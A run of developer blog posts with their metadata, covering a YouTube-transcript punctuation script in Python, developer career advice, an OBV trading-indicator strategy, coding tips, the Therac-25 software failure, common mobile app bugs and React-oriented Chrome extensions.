all_transcript_text = []
for transcript in transcript_list:
transcript_data = transcript.fetch()
transcript_text = " ".join(entry["text"] for entry in transcript_data)
all_transcript_text.append(transcript_text)
return " ".join(all_transcript_text)
def filter_tokens(text: str) -> str:
"""
Remove spaces from tokens in the text using spaCy.
"""
doc = nlp(text)
return " ".join(token.text for token in doc if not token.is_space)
def correct_text(text: str) -> str:
"""
Correct the text using TextBlob.
"""
blob = TextBlob(text)
return str(blob.correct())
def punctuate_text(texts: List[str]) -> List[str]:
"""
Punctuate and segment the texts using the pre-trained model.
"""
return m.infer(texts=texts, apply_sbd=True)
def main(video_id: str):
"""
Main processing function.
"""
transcript_text = process_transcript(video_id)
filtered_text = filter_tokens(transcript_text)
corrected_text_str = correct_text(filtered_text)
nested_sentences = nest_sentences(corrected_text_str)
results = punctuate_text(nested_sentences)
for input_text, output_texts in tqdm(zip(nested_sentences, results), desc="Processing", total=len(nested_sentences)):
print(f"Input: {input_text}")
print("Outputs:")
for text in output_texts:
print(f"\t{text}")
print()
if __name__ == "__main__":
video_id = "CUgtGjA6VvA"
main(video_id)
```
### Script Summary and Utility
This script is designed to process transcripts from YouTube videos and enhance their readability by applying punctuation, correcting errors, and ensuring proper segmentation. Here's a breakdown of its components and why it's useful:
#### Key Components:
1. **Import Libraries:**
- `PunctCapSegModelONNX` from `punctuators.models`: Adds punctuation and capitalization to the text.
- `TextBlob`: Corrects grammatical and spelling errors in the text.
- `YouTubeTranscriptApi`: Fetches transcripts from YouTube videos.
- `nltk` and `spacy`: Tokenizes and processes text to ensure proper segmentation.
2. **Initialization:**
- Load the pre-trained punctuation and capitalization model.
- Download necessary NLTK resources and load spaCy's English language model.
3. **Functions:**
- `nest_sentences(document: str, max_length: int = 1024) -> List[str]`: Groups sentences into segments not exceeding a specified length to maintain context and readability.
- `process_transcript(video_id: str) -> str`: Retrieves and concatenates transcripts from a given YouTube video ID.
- `filter_tokens(text: str) -> str`: Removes spaces and ensures proper tokenization using spaCy.
- `correct_text(text: str) -> str`: Uses TextBlob to correct grammatical and spelling errors in the text.
- `punctuate_text(texts: List[str]) -> List[str]`: Applies punctuation and segmentation to the text using the pre-trained model.
4. **Main Function (`main(video_id: str)`):**
- Retrieves the YouTube video transcript.
- Processes the transcript by filtering tokens, correcting text, nesting sentences, and applying punctuation.
- Prints the input and processed text for each nested segment.
#### Why This Script is Useful:
1. **Improves Readability:**
- Adds punctuation and capitalization, transforming raw transcripts into more readable text.
2. **Corrects Errors:**
- Uses TextBlob to automatically correct grammatical and spelling errors, enhancing the accuracy of the text.
3. **Ensures Proper Segmentation:**
- Splits text into manageable segments to maintain context and readability, especially useful for long transcripts.
4. **Automates Transcript Processing:**
- Simplifies the process of retrieving and enhancing YouTube video transcripts, saving time and effort for users.
5. **Educational Tool:**
- Can be included in a student package toolset to aid in processing and analyzing video transcripts for study purposes, making lecture notes or online video content more accessible and easier to study from.
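To see the chunk-grouping logic from `nest_sentences` in isolation, here is a dependency-free sketch of the same idea (using a naive regex splitter instead of NLTK, so abbreviations and other punctuation edge cases are not handled):

```python
import re
from typing import List

def nest_sentences_sketch(document: str, max_length: int = 1024) -> List[str]:
    """Group sentences so each chunk stays under max_length characters."""
    nested, current, length = [], [], 0
    # Naive splitter: break after ., ! or ? followed by whitespace.
    for sentence in re.split(r"(?<=[.!?])\s+", document.strip()):
        if length + len(sentence) < max_length:
            current.append(sentence)
            length += len(sentence)
        else:
            if current:
                nested.append(" ".join(current))
            current, length = [sentence], len(sentence)
    if current:
        nested.append(" ".join(current))
    return nested

chunks = nest_sentences_sketch(
    "One. Two is longer. Three ends it. Four more here.", max_length=25
)
print(chunks)  # → ['One. Two is longer.', 'Three ends it.', 'Four more here.']
```

Each chunk stays under the length limit while never splitting a sentence in half, which is what keeps the punctuation model's input windows coherent.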
Below is the output of the original CC from the video after it was processed:
```plaintext
Outputs:
I've come here to California on the trail of one of the most infamous doctors of the with century.
Or Alter Freemen, the last Alter Freemen began practicing as a doctor in the 1920s, going on to work in one of the last institutions set up to house growing numbers of mentally ill people.
The Shell Shocked victims of the First World War and inmates with Dreadful psychiatric problems lived out their lives in what were known as snake pits.
Psychiatric hospitals in the 1930s were terrible places to be as a patient, and they were terrible places because they were, they were places of hopelessness.
There were really no effective treatments for most mental disorders.
For the most part, these hospitals warehouse patients for long periods of times, decades, even entire lives.
Freemen was horrified at the sheer waste of human potential.
Now he started out with with good intentions.
And here was a terribly serious problem, and it wasn't getting any better, it was getting worse.
It was a public health problem.
Freemen was convinced that the root cause of many of the patients problems lay in the physical structure of their brains, so he decided to change them, a pulled by what he was seeing in these snake pits.
Freemen now spent increasing amounts of time in the laboratory, coat brains, dissecting brains, examining brains, looking for differences.
This is the brain received through the courtesy of Washington Sanitary.
Freemen thought that surgery could help patients far more than the current treatments are cut off at the level of the middle of the pond.
Spurred on by the growing understanding of what different regions of the brain do, he finally decided that the problem lay in a set of connections.
Between the thalamus and the frontal love The pointer demonstrates the thalamus and the anterior thalamic radiation going to all parts of the frontal.
Freemen believed if he could, never the connections between the thalamus and the frontal love.
And this would damper down all those awful emotions, and it would, if you like, cure the patients.
He saw this as Surgery of the Soul, a way of bringing the Damned back to life.
But there was a problem.
Freemen was not himself a surgeon, so he got together with a man who was James Wants, and together, they started performing the operation action they called lobotomy
[ Music ].
```
Overall, the quality is significantly better! All things considered, this script is a valuable tool for anyone looking to enhance the quality and readability of YouTube video transcripts, making it especially useful for students, researchers, and content creators. The script can also be extended with a transformer model and used for translation.
Till next time,
Roomal | roomals |
1,879,768 | Advice for Effective Developers | Syntax FM released a podcast episode 11 habits of highly effective developers yesterday, it's filled... | 0 | 2024-06-07T01:24:52 | https://jonathanyeong.com/advice-for-effective-developers/ | beginners, career, learning | Syntax FM released a podcast episode [11 habits of highly effective developers](https://syntax.fm/show/778/11-habits-of-highly-effective-developers/transcript) yesterday, it's filled with anecdotes, and great advice. If you haven't already, give it a listen! Scott Tolinksi and Wes Bos shared these 11 habits:
- Understand stakeholders and business goals
- Have an open mind about new tech
- Help others with problems
- Understand work-life balance
- Pay attention to details
- Be curious and always learning
- Ask for help when needed
- Have fun with development
- Be empathetic to users and coworkers
- Be part of the developer community
While listening, I made a mental note to keep practising these habits. I loved them! Especially having fun with development. Usually, I see programming as a way to solve business problems. I forget that it can also be used to make fun things!
After the podcast ended, I thought about what advice I would have given my past self to be a more effective developer. So I made a list! I'll add to it over time, and I hope you'll find the advice useful.
---
Naming is hard. Understanding the domain of your application can help. If possible, err on being specific with your name rather than generic.
Build your pattern matching muscle. Not regex (although that can be useful), but patterns with solving problems. Watch how others solve problems, debug, and write code. Go through the same process yourself over and over again.
Pair frequently and with different people. The benefits of pairing greatly outweigh working solo on complex issues.
"For each desired change, make the change easy (warning: this may be hard), then make the easy change" - [Kent Beck](https://x.com/KentBeck/status/250733358307500032)
Find the most straightforward path to solve a problem. If this path doesn't exist, can you make it happen? Only when you've exhausted your options should you look at more complicated solutions. *I find this advice the hardest to follow.*
Introspect often and stay away from autopilot mode. After finishing a tutorial, take the time to understand what you've learnt and how you could use that knowledge in other ways.
Pursue what is interesting to you. Drown out the hubbub, the trends, the absolutists. If you don't know what fascinates you yet, experiment.
Go broad on a topic before going deep. This advice ties in with the one above. Experiment until you find something, then go deep on it. Going broad diversifies your mental models. Going deep strengthens your models.
Have a career document aka brag document. Use it to show your impact in your role. Save all the good stuff people say about you or things that you're proud of. Look at it whenever you're feeling down or feeling like an imposter.
Practice saying no. Overcommitting is stressful. Burnout is real, take the time to care for yourself.
You don't need to write blog posts, produce content, or commit to open source to be a successful developer. But it can be a nice way to give back to the community. | jonoyeong |
1,879,767 | Detailed usage and practical skills of energy tide(OBV) indicator in quantitative trading | What is the energy tide? There is an idiom like this in ancient times: "always prepare... | 0 | 2024-06-07T01:20:45 | https://dev.to/fmzquant/detailed-usage-and-practical-skills-of-energy-tideobv-indicator-in-quantitative-trading-55ao | trading, fmzquant, cryptocurrency, obv | ## What is the energy tide?
There is an old idiom: "before the troops move, the provisions go first." Trading has a similar saying: "volume precedes price." It means that rises and falls in price are driven by trading volume, and every price move shows up in trading volume first. Because of this, the "On Balance Volume (OBV)" indicator was invented to measure volume.
The Energy Tide (OBV) was invented by Joe Granville in the 1960s. Although its algorithm is simple, among the four dimensions of trading (price, quantity, time, and space) it takes quantity as its entry point, and it has long been favored by many traders. As a popular indicator in the trading market, OBV intuitively reflects the relationship between price and volume, helping traders observe the market from more angles.
## The energy tide in the chart

As shown in the figure above, although OBV describes volume, its shape is clearly different from the raw volume bars. You may notice that the OBV curve largely tracks the price trend, with its own relative highs and lows, only smoother: it quantifies volume and plots it like a trend line.
## The theoretical basis of the energy tide
When the price agrees with what most traders expect, volume shrinks, because buyers have already bought and sellers have already sold. Conversely, when the price disagrees with what most traders expect, volume grows: buyers believe the price will keep rising, sellers believe it will fall, and when both act on those beliefs, volume increases. OBV therefore reflects not only market sentiment but also the balance of power between longs and shorts.
In addition, according to the principle of reflexivity ("ideas change the facts, and the change of facts in turn changes the ideas"), when people believe the price will keep rising, they buy; as a result, volume increases and the price continues to rise. When people see the price keep rising, they conclude it may rise further and push it up even more. This is why, when prices rise in the market, we also see heavy trading volume.
## Calculation method of energy tide
The calculation method of the energy tide is actually not complicated. If the current K-line's closing price is greater than the previous K-line's closing price, then the current K-line's OBV is the previous K-line's OBV plus the current K-line's volume. If the current closing price is less than the previous closing price, then the current OBV is the previous OBV minus the current volume. If they are equal, OBV is unchanged.
- If the current K-line closing price is greater than the previous K-line closing price, then:
OBV(i) = OBV(i - 1) + VOLUME(i)
- If the current K-line closing price is less than the previous K-line closing price, then:
OBV(i) = OBV(i - 1) - VOLUME(i)
- If the current K-line closing price is equal to the previous K-line closing price, then:
OBV(i) = OBV(i - 1)
Among them:
- OBV(i): the OBV of the current K-line
- OBV(i - 1): the OBV of the previous K-line
- VOLUME(i): the volume of the current K-line
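The three cases above translate directly into code. Here is a minimal Python sketch; it seeds the series at 0, a common convention, since only the shape of OBV matters, not its absolute level:

```python
def on_balance_volume(closes, volumes):
    """Compute the OBV series from closing prices and volumes (seeded at 0)."""
    obv = [0]
    for i in range(1, len(closes)):
        if closes[i] > closes[i - 1]:
            obv.append(obv[-1] + volumes[i])   # up close: add current volume
        elif closes[i] < closes[i - 1]:
            obv.append(obv[-1] - volumes[i])   # down close: subtract current volume
        else:
            obv.append(obv[-1])                # unchanged close: carry forward
    return obv
```

For example, closes of `[10, 11, 10, 10]` with volumes `[100, 200, 300, 400]` give an OBV series of `[0, 200, -100, -100]`.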
## The actual principle of energy tide
One of the most basic premises of using OBV is the assumption that changes in volume always appear before changes in price, the "volume precedes price" idea mentioned above. Usually a rise or fall in price must be matched by volume, and the growth or shrinkage of volume affects price changes all along. For example, a price rise or fall is generally accompanied by heavy volume; if the price moves while volume barely changes, that move is hard to sustain.
When OBV is rising, we can infer that funds are flowing into the market and trading is unusually active, so future prices may rise. When OBV is falling, we can infer that funds are being withdrawn and trading is going quiet, so future prices may fall.
How can we judge whether OBV is rising or falling? We can use the same methods we use to judge price direction. In both rising and falling phases, the trend does not move in one straight line; it advances in steps. Within the trend we can find peaks and troughs: in an uptrend, each trough is higher than the previous trough, and in a downtrend, each peak is lower than the previous peak.
In quantitative trading, however, it is not necessary to identify peaks and troughs to generate signals. You can use a moving average or a channel line to measure the trend of OBV, which is easier for novices to implement. For example, average the OBV over a period: if the current OBV is greater than this average, capital is optimistic about the market; if it is less, capital is losing interest in it.
## Energy tide trading logic
From the above principle of the energy tide, we can try to build a trading strategy based on OBV. Taking the simplest moving average as an example, we can average the OBV values to get moving averages of OBV. OBV describes volume well, but it says nothing about price, so we introduce another representative indicator, the Average True Range (ATR), which reflects price volatility over a period. Here is the logic of the whole strategy:
- First calculate the energy tide (OBV)
- Then calculate the Average True Range (ATR)
- Then calculate two moving averages (fast and slow) of OBV*ATR
- Long position open: both moving averages rising, and the fast one above the slow one
- Short position open: both moving averages falling, and the fast one below the slow one
- Long position close: either moving average falling, or the fast one below the slow one
- Short position close: either moving average rising, or the fast one above the slow one
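These entry and exit rules can be sketched in Python as follows. This is an illustrative sketch only, mirroring the strategy code in the next section: `b` is the fast moving average of OBV*ATR and `d` the slow one, each given as a list where index -1 is the current bar and -2 the previous bar.

```python
def crossover_signal(b, d):
    """Return 'long', 'short', or None from the two OBV*ATR moving averages."""
    b_up, d_up = b[-1] > b[-2], d[-1] > d[-2]
    b_down, d_down = b[-1] < b[-2], d[-1] < d[-2]
    if b_up and d_up and b[-1] > d[-1]:      # both rising, fast above slow: long
        return "long"
    if b_down and d_down and b[-1] < d[-1]:  # both falling, fast below slow: short
        return "short"
    return None                              # no entry condition met
```

The exit conditions are simply the complements: a long is closed as soon as either average turns down or the fast average drops below the slow one, and symmetrically for shorts.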
## Based on the energy tide trading strategy code
Through the above trading logic, we can build this strategy on the FMZ Quant quantitative trading platform. Let's use My language as an example. Follow these steps: fmz.com > Login > Dashboard > Strategy > New Strategy > click the drop-down box at the top-left corner and select My language, then start writing the strategy. Pay attention to the comments in the code below.
```
N:=10;                                // moving average period
// OBV: cumulative sum of volume, signed by the direction of the close
OBV:=SUM(IFELSE(CLOSE>REF(CLOSE,1),VOL,IFELSE(CLOSE<REF(CLOSE,1),-VOL,0)),0);
// True range of the current bar
TR:=MAX(MAX((HIGH-LOW),ABS(REF(CLOSE,1)-HIGH)),ABS(REF(CLOSE,1)-LOW));
ATR:=MA(TR,N);                        // average true range over N bars
B:EMA2(OBV*ATR,N);                    // fast moving average of OBV*ATR
D:EMA2(OBV*ATR,N*2);                  // slow moving average of OBV*ATR
B>REF(B,1) && D>REF(D,1) && B>D,BK;   // both rising and fast above slow: open long
B<REF(B,1) || D<REF(D,1) || B<D,SP;   // either falling or fast below slow: close long
B<REF(B,1) && D<REF(D,1) && B<D,SK;   // both falling and fast below slow: open short
B>REF(B,1) || D>REF(D,1) || B>D,BP;   // either rising or fast above slow: close short
AUTOFILTER;                           // filter signals: hold one position at a time
```
## Strategy backtest
The backtest environment is as follows:
- Trading variety: rebar index
- Time: March 27, 2009 ~ July 31, 2019
- Cycle: one hour
- Slippage: 2 pips for opening and closing positions
- Fee: 2 times the exchange's standard rate
**Fund Curve**

## Copy strategy source code
For more about this strategy, please click: https://www.fmz.com/strategy/159997
## End
In fact, OBV alone does not produce effective buy and sell signals, because prices change most in the early or middle stage of a rise or fall. Once a price trend is established, most traders come to agree with it: buyers have already bought, and sellers have already sold. At that point, even though the price is still rising, volume gradually shrinks, and this shrinking volume does not mean the trend is coming to an end.
Therefore, OBV is better suited to short-term strategies and can be counterproductive in medium- and long-term ones. In addition, OBV should not be used alone in live trading; treat it as an auxiliary tool as much as possible. Especially in an immature trading market, it needs corresponding improvements in order to show its true strength.
From: https://blog.mathquant.com/2019/08/02/detailed-usage-and-practical-skills-of-energy-tideobv-indicator-in-quantitative-trading.html | fmzquant |
1,879,756 | 11 Useful Tips for New Coders and Developers in 2024 | Starting a career or hobby in coding can feel intimidating. This field is ever-evolving and filled... | 0 | 2024-06-07T01:19:46 | https://dev.to/cynthia_kramer_db0fcf897f/11-useful-tips-for-new-coders-and-developers-in-2024-3442 | coding, webdev | Starting a career or hobby in coding can feel intimidating. This field is ever-evolving and filled with both endless possibilities and endless challenges. Where do you start?
The following tips will serve as your compass, guiding you into this shiny new world and helping you to develop a successful career or accomplish your goals.
Let’s get started.
## Start With the Basics
The first thing to do when you decide to learn to code is to pick a language to start with. There are so many out there, so it can be a little intimidating to know where to begin. The best approach is to do a little research and then choose a language that interests you or that best suits your purposes.
Once you choose the first language you will learn, you should learn the basics. The best way to do this is by building projects. Choose a few simple projects to work on and learn as you go along.
## Practice Regularly
Whenever you’re learning something new, developing a habit will help you carve out time for it. A daily coding habit will help you learn consistently, make steady progress on projects, and accomplish your goals more quickly. Of course, if your schedule doesn’t allow for this, you can develop a weekly habit instead. Just make sure you’re setting aside time once or twice a week to learn and work on projects.
## Break Down Projects and Problems
The projects you choose to work on can seem intimidating at first, especially when you’re just starting out. Breaking your projects down into small, manageable steps will help you make steady progress. Instead of looking at the project as a whole, focus on each step as you go.
You can take the same approach with problems that come up. Break it down into small steps you can take and before you know it, you’ll have moved past the roadblock and on to the next one.
## Try to Solve Problems Yourself First, But Don’t Be Afraid to Ask for Help
Solving coding problems yourself is exhilarating and teaches you how to solve it next time. Experiment with your code and think outside of the box until you find the solution.
But if you’ve hit a wall, don’t struggle alone. There are so many resources out there for finding answers to problems. Start with Google, then ask questions in forums and online communities. Someone may be facing the same challenge or have come up with something you hadn’t thought of.
## Study Others’ Code
Reading through others’ code can help you see what works and what doesn’t. It can also give you ideas for projects to try or things to implement in your code.
However, be careful here. Don’t copy and paste someone else’s code to use for yourself. Rather, learn what they did and why they did it. This can teach you new techniques and solutions. Use the lessons, not the specific code.
## Learn to Debug and Fix Errors
Learning to fix things in your code is an important skill that you should learn early on. Recognize when something is not working (testing can help with this) and determine how to fix it.
This is useful whether you are building projects for yourself or looking to get hired as a developer. Any employer or client will want you to be able to fix your own code and turn in work that doesn’t need to be corrected by someone else. This is especially true when building websites and apps for clients: they expect it to not have problems after you’ve turned it over to them.
## Always Learn New Things
Web development, coding, software development, and related fields are always growing, changing, and evolving. It’s important for you to evolve with them. There is always something new to learn: techniques, technologies, solutions for common problems, etc. Stay curious and you’ll always be up-to-date in your field.
## Type Out Code Instead of Copying and Pasting
We’ve covered not taking others’ code, but now I want to talk about learning resources. Courses and tutorials are wonderful ways to get started and learn new things. And many of them run you through projects that you can build and add to your portfolio.
However, I would warn against simply copying and pasting this code. That might be the easy, quick way to build a portfolio, but it’s not the best way to learn. Type out the code yourself and really try to understand why that particular piece of code is there. Then you can tweak the project for yourself as you decide to add elements or take something out.
## Solve Real-World Problems
Again, courses and tutorials are great for suggesting projects to add to your portfolio. But instead of the standard calculators and Google clones that are in everyone else’s portfolio, try to come up with something that solves a real problem. The additional benefit is that you might be able to turn this into a real product.
How do you come up with ideas for problems to solve? Look at the things that frustrate you or someone you know. Then take a look at the solutions that already exist. Is there room to improve these solutions? Is there something that you would add or get rid of? Build that ideal solution that you would use yourself.
## Be More Social
You might think that coding is a solitary activity, but it doesn’t have to be. There are so many communities out there for coders and developers, from social media groups to forums and even in-person meetups. Find a few that you like and become involved in the group. This means sharing your successes and failures, talking about things you’ve learned, asking questions, and helping others.
## Take Breaks
Staring at your code all day can lead you to become more tired and frustrated, especially when you hit that inevitable wall. Taking breaks will rest both your eyes and your mind, allowing you to return to your work refreshed. When I take a break from my work, I always find that new ideas occur to me that would not have if I continued to push through. Fresh eyes bring fresh perspective.
You can take a short break, like eating something or stretching. Or you can take a longer break to walk outside. Even taking a shower or going to sleep at the end of the day will help refresh you and give you new ideas to work on in the morning. Just remember to jot those ideas down!
## Takeaway
There was a lot of information in this post, but all these tips can be pretty much summed up like this:
**Be patient, be persistent, and be social.**
Remember these three things and you’ll find yourself with a successful and enjoyable career or hobby in the world of coding. | cynthia_kramer_db0fcf897f |
1,879,755 | The incident that highlighted the importance of code quality | Have you heard about the "Therac-25 incident"? The Therac-25 was a radiation therapy... | 0 | 2024-06-07T01:13:56 | https://dev.to/mmvergara/the-incident-that-highlighted-the-importance-of-code-quality-454d | programming, coding | ### Have you heard about the "Therac-25 incident"?
The Therac-25 was a radiation therapy machine used for cancer treatment in the 1980s.
The software was designed to control the radiation dosage delivered to patients, but a `race condition` in the software led to massive overdoses of radiation being administered to patients, causing severe injuries and even death.
Yeah just because of a bad code.
### But what can we take from it?
**Testing:** Some very small apps doesn't really need testing, but when we're dealing with user's privacy and security especially people lives, should you do testing was never a question.
**Safety-Critical Design Practices:** The importance of applying safety-critical design practices, such as redundant systems, fail-safes, and thorough risk analysis, especially in systems that can cause information leakage or harm if they malfunction.
| mmvergara |
1,868,789 | Top 15 Common Bugs in Mobile Apps and How to Fix Them | As experienced smartphone users, we have developed an eye for spotting defects in applications... | 0 | 2024-06-07T01:11:06 | https://dev.to/wetest/top-15-common-bugs-in-mobile-apps-and-how-to-fix-them-4ne1 | programming, devops, app, bug | As experienced smartphone users, we have developed an eye for spotting defects in applications quickly. From frustrating interfaces to buttons that cause apps to crash, we have encountered various issues. While it is essential not to overlook the most glaring bugs, our team has compiled a list of common problems to highlight the significance of a mobile engineer's role for both developers and end-users.

# SSL Certificate Handling Flaws
Despite the presence of built-in certificate handling code in iOS and Android, errors can still arise when app developers roll their own implementations. Exploiting this, attackers can trick the app into accepting counterfeit certificates that impersonate the app's legitimate server. Certificate handling flaws thus open the door to man-in-the-middle attacks, enabling attackers to intercept and tamper with information in transit.
# Data Leakage
While the mobile operating system provides a certain level of protection, it is not sufficient to prevent determined individuals from examining the internals of mobile apps. Mobile developers must remain vigilant about the fact that mobile apps can be reverse-engineered. This process can potentially expose sensitive information, including leaked data such as API keys, social network API tokens, AWS credentials, and RSA private keys. Developers must prioritize security measures and adopt practices that safeguard against these risks.
# Client-Side Validation
Security issues often arise when developers heavily rely on client-side validation for sensitive actions that require authentication. It is important to note that client-side validation bugs are more commonly found in mobile apps compared to web apps.
Client-side validation, while useful for improving user experience and providing immediate feedback, should never be solely relied upon for security purposes. Important security checks and validations should be performed on the server side to ensure the integrity and confidentiality of sensitive data and to prevent malicious activities.
Developers must prioritize a layered approach to security, implementing both client-side and server-side validation mechanisms, to effectively mitigate security risks and protect against potential vulnerabilities.
# Insecure Direct Object Reference
IDOR vulnerabilities are frequently encountered in an application's REST API: when the server trusts a client-supplied object identifier without checking ownership, an attacker can simply change the identifier to gain unauthorized access to another user's confidential data, such as the victim's private messages.
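A hypothetical sketch of the server-side fix for both of the issues above: never act on a client-supplied object ID without re-validating ownership on the server. The `db` dictionary and message shape here are purely illustrative, not any particular framework's API.

```python
def get_message(db, requester_id, message_id):
    """Fetch a message only if the requester owns it (server-side IDOR check)."""
    message = db.get(message_id)
    if message is None:
        return None
    # Never trust the client-supplied ID alone: verify ownership server-side.
    if message["owner_id"] != requester_id:
        raise PermissionError("not authorized to read this message")
    return message
```

The key point is that the authorization check runs on the server for every request; any client-side check is only a usability aid and can be bypassed.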
# Outdated Vulnerable Components
Despite the prominence of cybersecurity in the digital realm, app developers often overlook the potential vulnerabilities present in the components they utilize. This oversight can manifest in various ways, such as neglecting to promptly address or upgrade the foundational platform, frameworks, and dependencies, as well as failing to thoroughly test the compatibility of updated, upgraded, or patched libraries.
# Compatibility Bugs
In the digital era, it is essential to prioritize ensuring the compatibility of mobile apps with a wide range of devices. However, this task poses a significant challenge due to the multitude of hardware and software functionalities packed into smartphones today, which can be combined in countless unforeseen combinations.

# Inconsistencies in Page Layout Across Devices
When end-users access an app using devices of varying screen sizes, rendering inconsistencies, misalignments, and overlapping can occur. These issues, particularly in e-commerce applications, have the potential to result in substantial revenue losses. It's analogous to a shop window becoming blurry when a potential customer moves closer, potentially detracting them from making a purchase.
# Unnecessary Navigation
If an app requires a guide, it can indicate a fundamental usability problem. Ideally, an app should be intuitive and user-friendly enough that users can navigate and understand its features without the need for explicit instructions or a separate guide. A well-designed app should provide clear and intuitive user interfaces, logical navigation pathways, and appropriate feedback to guide users through the application without confusion or difficulty. However, in some cases, a brief tutorial or onboarding process may be necessary to introduce unique or complex features to users. The key is to strike a balance between simplicity and functionality, ensuring that the app is accessible and understandable for the majority of users without excessive reliance on external guides.
# Lacking Landscape Mode
A well-designed mobile app should be able to adapt seamlessly to both portrait and landscape orientations. Additionally, many experts suggest that different UI approaches should be considered for each orientation, particularly when the app includes video content.
# “Work-as-designed” Performance Issues
A group of issues can arise from flaws in app design: the application operates exactly as intended, but the design itself possesses inherent flaws. Some common examples include non-scalable architecture, improper loading techniques, excessive synchronization, and more.
Non-scalable architecture can hinder the app's ability to handle increased user traffic or growing data volumes efficiently. Improper loading techniques may result in slow loading times or an inefficient use of resources. Excessive synchronization can lead to delays or bottlenecks in data processing.
Addressing these design-related issues requires careful planning and consideration during the development process. Developers should strive to create scalable architectures, employ efficient loading techniques, and strike a balance with synchronization to ensure the app functions optimally and provides a seamless user experience.
# Memory-related Issues
Design-related issues in app development also encompass memory leakage, improper caching, and insufficient memory allocation.
Memory leakage occurs when the app does not properly release memory resources, leading to a gradual reduction in available memory over time. Improper caching refers to inefficient or ineffective storage of temporary data, leading to performance degradation or incorrect data retrieval. Insufficient memory allocation can result in application crashes or poor performance due to limited available memory for the app to operate.
Addressing these design issues requires careful memory management practices, implementing efficient caching mechanisms, and ensuring adequate memory allocation for optimal app performance. Developers should prioritize proper memory handling and caching strategies to avoid these detrimental issues in their app design.
# Interfacing Performance Issues
A range of issues can be triggered by factors such as using outdated drivers or libraries, neglecting regular database housekeeping, missing database indexes, or logging problems.
Using outdated drivers or libraries can introduce compatibility issues or security vulnerabilities, impacting the overall functionality and stability of the application. Neglecting regular database housekeeping, such as archiving or purging old data, can lead to increased storage usage, slower database performance, and potential data corruption. Missing database indexes can affect query performance and result in slower response times. Logging issues, such as excessive logging or inadequate error handling, can impact system performance, cause storage bloat, or potentially expose sensitive information.
To mitigate these issues, developers must ensure they are using up-to-date drivers and libraries, maintain regular database housekeeping routines, implement appropriate database indexing strategies, and establish robust logging practices. Proactive monitoring and regular maintenance can help identify and rectify potential issues, ensuring the smooth operation of the application.
# Slow Response Time
There are several common reasons why a mobile app may experience slowness. These include:
1. Network latency: Slow network connections or high latency can significantly impact the app's performance.
2. Unoptimized encrypted connections: If encrypted connections are not properly optimized, it can lead to increased overhead and slower data transmission.
3. Sluggish server speed: If the server that the app interacts with is slow in processing requests, it can cause delays in data retrieval or updates.
4. Chatty conversations: Excessive back-and-forth communication between the app and the server, such as making frequent API calls, can introduce delays and impact performance.
5. App overcrowdedness with data: If the app's data storage becomes cluttered or overloaded with excessive data, it can slow down data retrieval and processing operations.
# Crashes
Indeed, apps can crash due to unnoticed bugs, and it is crucial to thoroughly test any added feature or functionality. Testing helps identify and resolve software defects before they affect the end users. By conducting comprehensive testing, including unit testing, integration testing, and user acceptance testing, developers can uncover and fix potential issues that could lead to crashes. Additionally, implementing regular quality assurance processes and utilizing automated testing tools can further enhance the app's stability and reliability.
App development is indeed a complex process, and ensuring the quality of your app is crucial for maintaining your reputation and providing a positive user experience. The checklist above covers some important aspects of bug detection.
However, here are a few additional points you may want to consider:
1. Test the app on various devices: It's essential to test your app on a wide range of devices to ensure compatibility and functionality across different screen sizes, hardware configurations, and manufacturers.
2. Test different data scenarios: Evaluate how your app handles different data scenarios such as low network connectivity, slow internet speeds, and large data volumes to ensure optimal performance.
3. Test for usability and user experience: Conduct user testing to gather feedback on the app's usability, navigation, and overall user experience. This can help identify and address any potential issues or areas of improvement.
4. Security testing: Verify the app's security features by conducting penetration testing and vulnerability assessments to identify any potential security risks and ensure the app's data protection.
5. Test for edge cases: Test the app under unusual or extreme conditions, such as low battery, low storage space, or high resource usage, to uncover any unexpected bugs or issues.
6. Regression testing: Perform regression testing to ensure that new updates or changes to the app have not caused any previously fixed bugs to resurface.
Remember that this checklist is a starting point, and the specific testing requirements may vary depending on the complexity and functionality of your app. Regular testing and continuous improvement are essential to deliver a high-quality app to your users.
# Conclusion
Mobile app development is a complex process that requires attention to detail and thorough testing. By addressing these top 15 common bugs, developers can deliver high-quality apps that provide a seamless and enjoyable user experience. Prioritizing security, performance optimization, compatibility, and usability will help create apps that meet user expectations and stand out in a competitive market.
To ensure comprehensive testing and bug detection, developers can rely on WeTest Mobile App Testing. WeTest integrates cutting-edge tools such as automated testing, compatibility testing, functionality testing, remote device testing, performance testing, and security testing. With WeTest, developers can cover all testing stages of their apps throughout their entire lifecycle, ensuring optimal performance and reliability.
[For more information, contact WeTest team at → WeTest-All Test in WeTest](https://wetest.net/?utm_source=dev&utm_medium=forum&utm_content=top-15-common-bugs)
| wetest |
1,879,754 | Chrome Extensions for React Developers | Google developed Google Chrome (or just Chrome), a popular internet browser. One of the reasons... | 0 | 2024-06-07T01:09:48 | https://dev.to/xuanmingl/chrome-extensions-for-react-developers-1c94 | webdev, react, chrome, beginners | Google developed [Google Chrome](https://www.google.com/chrome/) (or just Chrome), a popular internet browser. One of the reasons Chrome is the most popular browser for web development is that it ships with Chrome developer tools out of the box and allows third-party dev tools to be installed in the browser, providing extra capabilities for web development, such as React-focused Chrome extensions.
# [1. React Developer Tools](https://chrome.google.com/webstore/detail/react-developer-tools/fmkadmapgofadopljbjfkapdkoienihi)
You will get two new tabs in your Chrome DevTools: “⚛️ Components” and “⚛️ Profiler”.
The Components tab shows you the root React components that were rendered on the page, as well as the subcomponents that they ended up rendering.
By selecting one of the components in the tree, you can inspect and edit its current props and state in the panel on the right. In the breadcrumbs, you can inspect the selected component, the component that created it, the component that created that one, and so on.
# [2. Lorem Ipsum Generator](https://chromewebstore.google.com/detail/lorem-ipsum-generator/pglahbfamjiifnafcicdibiiabpakkkb)
Quickly generate Lorem Ipsum placeholder text. Select a desired length and choose between paragraphs, words, bytes or lists.
Elegantly designed and easy to use. The values you enter are stored so that your preferred option will always be immediately available.
# [3. Redux DevTools](https://chromewebstore.google.com/detail/redux-devtools/lmhkpmbekcpmknklioeibfkpmmfibljd)
The extension provides power-ups for your Redux development workflow. Apart from Redux, it can be used with any other architecture that handles state.
# [4. What Font - font finder](https://chromewebstore.google.com/detail/what-font-font-finder/opogloaldjiplhogobhmghlgnlciebin)
What Font lets you identify a font's name, family, color, style, size, and position. It is a great tool for building well-designed web pages quickly. Now you can simply spot a font you like and select exactly the same one for your needs, without a long search for a suitable alternative. This extension supports the Google Fonts API as a font finder, so you will have info about all popular Google Fonts.
# [5. ColorZilla](https://chromewebstore.google.com/detail/colorzilla/bhlhnicpbhignbdhedgjhgdocnmhomnp)
